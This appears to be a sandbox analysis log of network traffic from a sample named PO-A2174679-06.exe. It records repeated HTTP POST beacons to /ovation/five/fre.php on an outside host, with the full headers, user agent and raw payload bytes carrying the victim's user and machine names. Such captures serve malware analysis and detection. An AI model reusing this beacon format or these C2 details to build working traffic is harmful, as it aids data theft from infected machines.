                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            18192.168.2.549751192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:45.281075954 CET5396OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:45.445209980 CET5396OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:45.682168007 CET5397INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:45 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            19192.168.2.549752192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:46.290244102 CET5397OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:46.453449011 CET5398OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:46.657223940 CET5398INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:46 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.549734192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:27.514702082 CET5363OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:27.678800106 CET5363OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:27.879473925 CET5364INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:27 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            20192.168.2.549753192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:47.113450050 CET5399OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:47.280649900 CET5400OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:47.496956110 CET5426INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:47 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            21192.168.2.549755192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:47.991494894 CET5470OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:48.152970076 CET5491OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:48.352315903 CET5501INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            22192.168.2.549759192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:48.867384911 CET5546OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:49.033982992 CET5548OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:49.230602980 CET5557INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:48 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            23192.168.2.549761192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:49.698286057 CET5734OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:49.873977900 CET5738OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:50.121752977 CET5747INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:49 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            24192.168.2.549763192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:50.602565050 CET5949OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:50.764679909 CET5950OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:50.962508917 CET5958INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:50 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            25192.168.2.549765192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:51.403125048 CET6010OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:51.564685106 CET6011OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:51.755176067 CET6011INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:51 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            26192.168.2.549766192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:52.189174891 CET6012OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:52.352931023 CET6012OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:52.543189049 CET6012INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:52 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            27192.168.2.549767192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:53.017834902 CET6013OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:53.179913998 CET6014OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:53.370479107 CET6014INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            28192.168.2.549768192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:53.820832968 CET6015OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:53.983036995 CET6015OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:54.207701921 CET6016INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:53 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            29192.168.2.549769192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:54.628473043 CET6020OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:54.790364027 CET6021OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:54.987622023 CET6024INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:54 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.549735192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:29.621978045 CET5365OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:29.784650087 CET5365OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:29.983164072 CET5365INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:29 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            30192.168.2.549770192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:55.479697943 CET6029OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:55.641505003 CET6031OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:55.832416058 CET6034INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:55 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            31192.168.2.549771192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:56.264238119 CET6035OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:56.427298069 CET6035OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:56.637950897 CET6035INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:56 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            32192.168.2.549772192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:57.090883970 CET6036OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:57.260030031 CET6037OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:57.455832958 CET6037INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:57 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            33192.168.2.549773192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:57.912353039 CET6038OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:58.074640036 CET6038OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:58.269815922 CET6038INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            34192.168.2.549774192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:58.700265884 CET6039OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:58.862180948 CET6039OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:59.063069105 CET6040INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:58 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            35192.168.2.549775192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:49:59.551681042 CET6041OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
                            Feb 23, 2021 08:49:59.713944912 CET6041OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 33 00 32 00 39 00 32 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54
                            Data Ascii: (ckav.rualfons632922DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Feb 23, 2021 08:49:59.925751925 CET6041INHTTP/1.1 200 OK
                            Date: Tue, 23 Feb 2021 07:49:59 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, close
                            Content-Length: 23
                            Content-Type: text/html
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            36192.168.2.549776192.185.78.14580C:\Users\user\Desktop\PO-A2174679-06.exe
                            TimestampkBytes transferredDirectionData
                            Feb 23, 2021 08:50:00.379571915 CET6042OUTPOST /ovation/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: accessasia.com.hk
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: 5EB0DDEC
                            Content-Length: 165
                            Connection: close
